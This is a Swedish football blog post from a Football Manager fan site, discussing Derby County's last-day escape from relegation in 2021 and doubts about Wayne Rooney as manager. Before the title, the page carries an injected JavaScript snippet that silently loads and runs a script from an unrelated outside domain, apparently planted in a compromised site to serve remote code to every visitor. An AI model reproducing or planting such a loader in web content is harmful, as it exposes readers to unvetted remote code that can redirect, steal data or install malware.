;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Över redan för Wayne Rooney? – FMSweden
Meny Stäng

Start of the week – Över redan för Wayne Rooney?

I lördags med start 13.30 skulle Championship avslutas. Den sista omgången på den alltid så sanslöst långa säsongen stod för dörren. Toppen var redan klar och det var i dem nedre regionerna av tabellen som dramat fanns på förhand och som det bjöds på drama. 90 minuter total ångest för supportrarna till klubbarna, Rotherham, Sheffield Wednesday och Derby. Där dem två sistnämnda klubbarna ställdes mot varandra. 90 minuter som lämnade mig med en känsla. Det hade kunnat vara över för Wayne Rooney redan i lördags.

Rooney lade den här säsongen skorna på hyllan där han till en början var spelande tränare men som det brukar bli med den rollen nuförtiden blir man mer tränare än spelare och den 15:e januari hängde han upp skorna i björken för att satsa fullt ut på tränarjobbet. Resten av säsongen plus två år till landade kontraktet på men det kunde varit över redan den 8:e maj 2021. 25 poäng på 24 matcher har Derby mäktat med sen Rooney tog över som huvudtränare och inför mötet med Sheffield Wednesday skulle en förlust innebära League One för Derby.

I halvtid på Pride Park var Derby ett League One lag. Men efter att Rooney klickat på ”Kasta vattenflaska” och sagt ett bara väl valda till laget i paus vände Derby på steken men det betydde inte att man hade flirtat klart med League One. I minut 70 var Derby återigen ett League One lag. Martyn Waghorn dunkade dock dit 3–3 på straff i minut 78 och Derby redde ut stormen (med hjälp av Cardiff som kvitterade mot Rotherham i minut 88) och kontraktet säkrades på säsongens sista dag men för att återgå till den känslan jag lämnades av så hade det kunnat vara över redan i helgen för Wayne Rooney.

Den alltid så unga Wayne Rooney blev väldigt gammal, väldigt snabbt som spelare. Som tränare är han nu ung igen men frågan är om han ens hinner bli gammal som tränare. Min känsla är att han hade fått sparken om Derby blivit ett League One lag i lördags och hur hämtar man sig från det? Hur långt kommer man på namnet om man lyckats träna ner Derby i League One under sitt första halvår som huvudtränare. Jag hade varit försiktig med mellanslags-knappen i sommar om jag vore Wayne Rooney. Den här sommaren får inte gå till spillo utan han måste komma tillbaka till jobbet men nyfödd energi och en tydlig spelidé. En viktig erfarenhet som tränare har han fått med sig men här finns det väldigt mycket att göra.

Det Derby som 2019 spelade final på Wembley är ett minne blott och Rooney måste ta Derby tillbaka till att börja med, vara ett stabilt Championship-lag. Han kommer säkerligen göra det med ett stukat förtroende från styrelsen och resultaten måste börja gå hans väg ganska omgående när Championship drar igång igen i augusti. Han överlevde denna gång men jag sätter ett stort frågetecken för Wayne Rooney som huvudtränare samtidigt som jag är väldigt spänd på att följa hans fortsatta tränarkarriär för han startar med en helt annan motvind här än vad han gjorde med som spelare och klarar han av att lyfta i den här motvinden så kan det bli väldigt bra till slut.

Med det sagt skickar jag med som ett tips att ta över Derby på FM om man vill ha en ordentlig utmaning. Truppen är bättre än vad Rooney lyckats åstadkomma. Men det är en ordentlig nedmontering dem gått igenom sen finalförlusten mot Aston Villa 2019.

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar